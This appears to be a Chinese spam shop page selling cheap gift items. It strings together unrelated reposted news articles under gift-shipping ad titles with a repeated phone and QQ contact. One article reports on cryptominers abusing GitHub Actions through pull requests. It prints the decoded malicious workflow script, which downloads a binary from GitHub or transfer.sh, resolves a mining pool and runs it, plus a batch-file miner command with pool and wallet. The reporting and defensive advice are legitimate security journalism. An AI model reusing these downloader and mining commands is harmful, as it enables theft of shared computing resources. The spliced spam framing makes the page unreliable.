新品上新

查看更多>

.

皮尺带卡片

重量:0.005kg库存9709

¥0.4立即购买

气球打气筒

气球打气筒

重量:0.03kg库存4161

¥0.7立即购买

小风扇

重量:0.05kg库存26106

¥1.7立即购买

得力笔袋

重量:0.05kg库存9576

¥14立即购买

热销单品

查看更多>

小皮尺1卷

重量:0.01kg库存85111

¥0.4立即购买

塑料梳子1只

重量:0.005kg库存192799

¥0.4立即购买

电商洗衣粉

重量:0.249kg库存39700

¥0.65立即购买

梳子一把

重量:0.005kg库存48486

¥0.2立即购买

香包随机发

重量:0.011kg库存7426

¥0.2立即购买

剥橙器

重量:0.01kg库存13339

¥0.2立即购买

照片木夹1个

重量:0.01kg库存22518

¥0.2立即购买

洗发露1包

重量:0.011kg库存45266

¥0.2立即购买

礼品代发-首次采用全面屏 iPad mini 6新渲染图曝光

联系电话:18457923343,QQ:274982735,

据此前消息,苹果今年将不再开春季新品发布会,而原定的春季发布会主角新iPad系列将通过官网直接上架开售的方式亮相。除了饱受关注的Mini LED屏版本iPad Pro外,今年的iPad mini 6也将带来一些重磅改变。

访问:

网曝iPad mini 6渲染图

首先是外观方面,iPad mini 6将改变屏幕形态,首次引入此前iPad Air 4类似的全面屏,整体屏占比大幅提升,同时还将取消正面的圆形HOME键,将Touch ID融入侧面的实体电源按键中。

值得一提的是,由于iPad mini 6的屏占比有效提升,该机的屏幕尺寸也会得到相应的提升,至少搭载一块8.4英寸的屏幕,但是机身尺寸可能变化不大。

配置方面,iPad mini 6有望搭载最新的A14仿生芯片,这是目前全球性能最强的移动平台之一,同时还将内置骁龙5G基带,支持5G网络连接,还将提供64/128/256GB三种存储版本,并支持Apple Pencil 2代。

需要注意的是,由于iPad mini 6在外观、配置方面拥有全方面的升级,该机的售价也将水涨船高,不过整体依然会维持入门级市场定位,所以将会成为最便宜的A14设备。

相关文章:

代发礼品包-海南自贸港国际互联网数据专用通道开通

联系电话:18457923343,QQ:274982735,

  中新社海口4月12日电 (记者 黄艺)海南自由贸易港国际互联网数据专用通道4月12日正式开通,系中国第一个以省为单位申报建设的专用通道,首批覆盖海南9个园区,将明显提升企业国际互联网访问体验。

  该通道服务覆盖洋浦经济开发区、海南博鳌乐城国际医疗旅游先行区、海口国家高新技术产业开发区、海口复兴城互联网信息产业园、海口市江东新区、海口综合保税区、三亚崖州湾科技城、三亚互联网信息产业园、海南生态软件园9个园区。

  据中国信息通信研究院副总工程师史德年介绍,经中国信息通信研究院“全球互联网感知分析平台”测试,海南自由贸易港国际互联网数据专用通道至全球大部分区域性能均得到显著提升,专用通道的全球网络平均时延和平均丢包率较非专用通道分别降低12.84%和89.54%,特别是专用通道至东南亚方向的平均时延降低44%,至港台地区、东南亚、大洋洲、南美洲方向的平均丢包率低于0.5%,主要性能指标与韩国、日本、新加坡等发达国家相当。

  海口复兴城互联网信息产业园招商副总经理崔莉莉表示,国际互联网数据专用通道开通后,复兴城园区及企业可通过此数据专用链路直达国际通信出入口局,改善访问国际互联网的性能。

  海南省通信管理局局长平义真表示,海南自由贸易港国际互联网数据专用通道的实施为海南自由贸易港建设提供高质量的通信基础设施,为园区营造优质的国际通信营商环境,助力旅游康养、港口物流、医药产业、互联网、跨境电商等产业的聚集发展。

原标题:海南自贸港国际互联网数据专用通道开通

快递礼品单-作家梁晓声:一个时代的书记员

联系电话:18457923343,QQ:274982735,

  北京4月11日电 题:作家梁晓声:一个时代的书记员

  记者 应妮

  以115万字三卷本《人世间》于2019年获得第十届茅盾文学奖之后的一年,梁晓声又推出一部全新长篇小说《我和我的命》。

  斯时,这位作家已经71岁。新作关于女性命题的书写,再次击中时代的靶心。

  “她”,令作家念念不忘

  作为一个密切关注现实的作家,从最早的《这是一片神奇的土地》《今夜有暴风雪》等关心知青的命运;到现在,梁晓声最关心普通底层人民的命运。

  长篇小说《我和我的命》用现实主义的笔法写了普通人的奋斗史:一个1982年出生的女性,出生后被遗弃,但在随后的人生成长中的奋斗。

  梁晓声表示写这样的人物已经想了很久,曾经他在一篇旧文中写过,“如果有上苍的话,给我的感觉是,它似乎有意识的、分批次地让某些贫困的家庭选送责任的种子,当这些子女们长大之后成为这个家庭的责任成员,他们能撑起那样一些贫困家庭的屋顶。”

  他至今记得2000年收到的一封读者来信,说她小姨就是这样的女孩,最早离开贫困农村到深圳打工,不但把几个姐姐家孩子的工作安排在了深圳,甚至村里张家、李家都会到深圳找她,感觉她的那个小房子非常像某村办事处。“那个小姨早晨起来找鞋子要上班的时候,像跳芭蕾舞一样,在孩子们之间跳来跳去,因为沙发上、床上、地上已经睡满了同村的男孩或者女孩,这个细节给我很深的印象。”

  因为这个印象太深,梁晓声始终就觉得,这样一个小姨的形象应该摆放在他哪部作品中。“在《人世间》,我没有余地把她放进去。这是我的一个遗憾,所以这个初心一直在纠缠着我,完成了《人世间》之后,我觉得我要为这样的小姨单独立一个传,她不只是一个个体,她代表着那个年代许多这样肩负起家庭的,家族的,扶贫责任的一些孩子们的身影,所以也是使我非常感动的一些青年。”

  “人”,要有为人的善良

  梁晓声坦言,十多年来一直想写关于“80后”的青年,写他们在刚步入社会、参加工作后的人生,给所有的“80后”鼓鼓劲,尤其给那些在北上广拼搏的“80后”们,希望给他们带来一种动力。

  在他的观察中,当“80后”大学毕业时,社会已经发生了巨大变化。“我在那个年代已经是‘愤青’了,对于那些出身强于别人、还拥有优渥资源的同代人,有一种忿忿不平。我们那时候大学毕业生还是天之骄子,而现在的‘80后’不仅要面临巨大的竞争压力,还有更大的收入差距、生活品质差距,直面这些差距,还在继续努力工作,我挺佩服这些年轻人的。”

  小说聚焦于“命运”这个主题,并提出人有“三命”:一是父母和原生家庭给的叫“天命”,二是由自己生活经历决定的叫“实命”,三是个人文化给的叫“自修命”,梁晓声进而总结“人是社会关系的总和”。如同书中的“我”,因为是女孩被父母遗弃,命运随之转变,从农家到了知识分子家庭,此后“我”在深圳找到爱情、收获友情、感悟亲情,然而“命运”却要我交出不到四十岁的生命……与此同时,原生家庭的亲情绑架从未停止,生活在底层的亲人提出各种要求,“我”虽然愤怒无奈,却也总是不能袖手旁观……

  一以贯之的是,他依然想通过此书来传达,作为人最重要的善良。

  在书的结尾,他写了一句话,“我善良、我宽容,我坚韧,我成为我。”在梁晓声看来,如果一个人不善良,如果我们从小都没有对他(她)进行善良教育,他(她)以后绝对没有任何事业可谈。即使他(她)凭分数进了大学,以后的人生也是堪忧的。

  作家,时代的书记员

  在梁晓声一篇《普通人要怎么度过自己平凡的一生?》的访谈中,他提出“一个时期以内,我们的文化形态存在着我大不以为然的现象,一种对于金钱财富和地位的过分的、巨大泡沫般的追捧。而这实际上是对平凡普通人们存在价值的一种危害和杀伤。”

  而他写《我和我的命》的冲动在于:要通过这本书确立普通者的作用和尊严,普通者可敬的那一面。

  “文化给我们的一种好处就在于,可以适时提醒我们调整自己的人生方向,思考退一步海阔天空。不但要经常问自己,你到底要什么,还要经常问自己,什么才是够?多少才是够?我觉得把这些都和自己对话清楚了之后,可能人生会相对变得压力减轻一些。”他在文中说。

  作为与新中国同龄的作家,梁晓声透露自己确实已经在有意识地退场了,也毫不掩饰自己已经写累了。他现在已经有很严重的颈椎病,或许还会写,但也已经有着抽身离去、不再写作的准备。

  有评论家如是评价梁晓声——他是一个对现实高度关注的人,一个时刻把自己放在时代旋涡中的作家。正如梁晓声的自况,“作家不可避免成为一个时代的书记员”。(完)

快递礼品单-《用音乐学古诗》助力中小学传统文化教育

联系电话:18457923343,QQ:274982735,

  北京4月11日电 孔子曾有言:“诗可以兴,可以观,可以群,可以怨。”古典诗词作为中华民族优秀传统文化结晶,始终闪烁着光芒。

  中译出版社日前推出《用音乐学古诗》一套共两本,包括1-6年级分册、7-9年级分册。内容涵盖了义务教育小学及初中语文教科书必背的190余首古诗词,其中小学版涵盖108首、初中版涵盖85首。小学版自2020年1月上市以来,得到了教育界的老师及家长们的认可,反响热烈。《用音乐学古诗》将古诗词与现代音乐相结合,赋予中国经典诗词沁人心脾的优美传承方式,向世人呈现中国文化的意识、审美和情怀。

  该书作曲及监制刘尊,是中国关心下一代工作委员会—全国关爱各族少年儿童主题教育爱心大使,中国知名词曲作家、资深音乐制作人,首部《唐诗300首歌曲》作曲人。此外,书中还配有翻译大家许渊冲的优美译文,著名画家仇立权的插图,以及林玮博士撰写的诗词赏析,诗里诗外画龙点睛。

  中译出版社有限公司执行董事(社长)、党委书记、总编辑乔卫兵表示,五千年中华文化源远流长,正是因为我们的世代传承。用音乐学古诗,便是将中华传统文化通过现代音乐的方式永久地流传下去。中译出版社秉承繁荣文化、传承文明的出版宗旨,该书的出版,不仅是一种新的文化创新与尝试,也是用新的文化发展形式将中华文化魅力展现出来,让中国特色的传统文化重新焕发光彩,其独特性不言而喻。(完)

礼品代发-黑客用GitHub服务器挖矿:三天跑了3万个任务 代码惊现中文

联系电话:18457923343,QQ:274982735,

加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿?黑客们动起了歪心思——“白嫖”服务器。给PC植入挖矿木马,已经无法满足黑客日益增长的算力需求,如果能用上GitHub的服务器,还不花钱,那当然是极好的。

而且整个过程可能比侵入PC还容易,甚至都不需要程序员上当受骗。只需提交Pull Request(PR),即使项目管理者没有批准,恶意挖矿代码依然能够执行。

原理也很简单,利用GitHub Action的自动执行工作流功能,轻松将挖矿程序运行在GitHub的服务器上。

早在去年11月,就已经有人发现黑客这种行为。更可怕的是,半年过去了,这种现象依然没得到有效制止。

GitHub心里苦啊,虽然可以封禁违规账号,但黑客们玩起了“游击战术”,不断更换马甲号逃避“追捕”,让官方疲于奔命。

就在几天前,一位荷兰的程序员还发现,这种攻击方式依然存在,甚至代码里还出现了中文。

那么,这些黑客是如何植入挖矿程序的呢?一切要从发现异常的法国程序员Tib说起。

PR异常让程序员起疑心

去年11月,Tib发现,自己在一个没有参加的repo上收到了PR请求。而且在14个小时内就收到了7个,全是来自一个“y4ndexhater1”的用户,没有任何描述内容。

令人感到奇怪的是,这并不是一个热门项目,Star数量为0。

打开项目主页发现,内容是Perl项目的github action、circle ci、travis-ci示例代码集合,整个README文档一团糟,根本不像一个正经的开源项目。

然而就是这个混乱又冷门的repo,居然在3天里被fork了2次。

一切都太不正常了,让人嗅到了一丝不安的气息。

尝试“作死”运行

本着“作死”的精神,Tib决定一探究竟。

经过那位可疑用户的操作,Tib所有的action都被删除,在工作流里被加入了一个ci.yml文件,内容如下:

当Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt这一行内容后,立刻从沙发上跳了起来,他意识到事情的严重性:有人在入侵他的GitHub个人资料!

这串看似神秘的字符,其实是base64编码,经过翻译后,得到了另一段代码:

apt update -qq

apt install -y curl git jq

curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog

ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')

chmod u+x prog

timeout 4h ./prog -o '${ip}:3000' -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

前面两行不必解释,有意思的地方从第三行开始,它会下载一个prog二进制文件。

为了安全起见,Tib先尝试获取信息而不是执行,得到了它的十六进制代码。

$ objdump -s --section .comment prog

prog: file format elf64-x86-64

Contents of section .comment:

0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.

0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1

0020 20323032 30313230 3300 20201203.

Tib也考虑过反编译,但是没有成功。

不入虎穴,焉得虎子,Tib决定尝试运行一下。

要执行这一大胆而又作死的任务,防止“试试就逝世”,Tib首先断开了电脑的网络链接,并选择在Docker容器中运行。

答案终于揭晓,原来这个prog是一个名为XMRig的挖矿程序。

$ ./prog --version

XMRig 6.8.1

built on Feb 3 2021 with GCC 10.2.1

features: 64-bit AES

libuv/1.40.0

OpenSSL/1.1.1i

hwloc/2.4.0

当时XMRig的最新版恰好是6.8.1,和上面的版本参数符合。不过用SHA256检测后发现,这个prog并不完全是XMRig,Tib预测它可能是一个修改版。

实际上,可能被攻击的不止GitHub,安全公司Aqua推测,像Docker Hub、Travis CI、Circle CI这些SaaS软件开发环境,都可能遭受这类攻击。

在这个攻击过程中,会派生一个合法的repo,负责将恶意的GitHub Action添加到原始代码。然后,黑客再向原始repo提交一个PR,将代码合并回原始repo。

下载的挖矿程序会伪装成prog或者gcc编译器,通过提交PR在项目执行自动化工作流。此时服务器将运行伪装后的挖矿程序。

这些攻击者仅一次攻击就可以运行多达100个挖矿程序,从而给GitHub的服务器带来了巨大的计算量。

据Aqua估计,仅在三天的时间里,挖矿黑客就在GitHub上有超过2.33万次commit、在Docker Hub上5.8万次build,转化了大约3万个挖矿任务。

可以防范但很难根除

这种攻击甚至不需要被攻击的仓库管理者接受恶意Pull Request。

只要在.github/workflows目录里面的任意.yml文件中配置了在收到Pull Request时执行,来自黑客的Action就会自动被执行

如果你没有使用这个功能,那就不用担心啦,黑客大概也不会找上你。

需要用到这个功能的话,可以设置成只允许本地Action或只允许Github官方及特定作者创建的Action。

将情况反馈给客服后,GitHub会对恶意账号进行封号和关闭相关Pull Request的操作。

但恶意攻击很难被根除,黑客只需要注册新的账号就可以继续白嫖服务器资源。

攻击还在继续

我们从最近一次攻击中发现,黑客将挖矿程序上传到GitLab并伪装成包管理工具npm。

打开这个可疑的nani.bat,可以看到:

npm.exe --algorithm argon2id_chukwa2

--pool turtlecoin.herominers.com:10380

--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP

--password xo

这一次黑客挖的是乌龟币*(TurtleCoin)*,可使用CPU计算。按当前价格挖出四千多个币才值1美元。

Github Actions的免费服务器可以提供E5 2673v4的两个核心,7GB内存。

大致估算单台运行一天只能获利几美分,而且黑客的挖矿程序通常只能在被发现之前运行几个小时。比如Docker Hub就把自动build的运行时间限制在2个小时。

不过蚊子再小也是肉,黑客通过寻找更多接受公开Action的仓库以及反复打开关闭Pull Request就能执行更多的挖矿程序。

同一黑客账号至少攻击了95个GitHub仓库

正如Twitter用户Dave Walker所说的,如果你提供免费的计算资源,就要做好会被攻击和滥用的觉悟。挖矿有利可图的情况下这是不可避免的。

据报道,受害的不止GitHub,还有Docker Hub、Travis CI以及Circle CI等提供类似服务的持续集成平台。

这一乱象不知何时才能结束,唯一的好消息可能就是,挖矿的黑客似乎只是针对GitHub提供的服务器资源,而不会破坏你的代码。

但是GitHub Action的漏洞不止这一个。还有方法能使黑客读写开发者的仓库,甚至可以读取加密的机密文件。

去年7月,Google Project Zero团队就已向GitHub通报漏洞。但在给出的90天修复期限+延长14天后,GitHub仍未能有效解决。

对此,我们的建议是,不要轻易相信GitHub市场里的Action作者,不要交出你的密匙。

相关文章: